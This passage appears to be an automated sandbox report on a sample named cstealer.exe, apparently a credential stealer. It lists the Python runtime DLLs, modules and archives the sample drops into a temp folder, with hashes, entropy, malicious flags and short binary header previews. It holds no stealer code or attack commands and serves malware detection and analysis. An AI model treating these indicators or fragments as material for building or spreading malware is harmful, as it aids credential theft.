                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
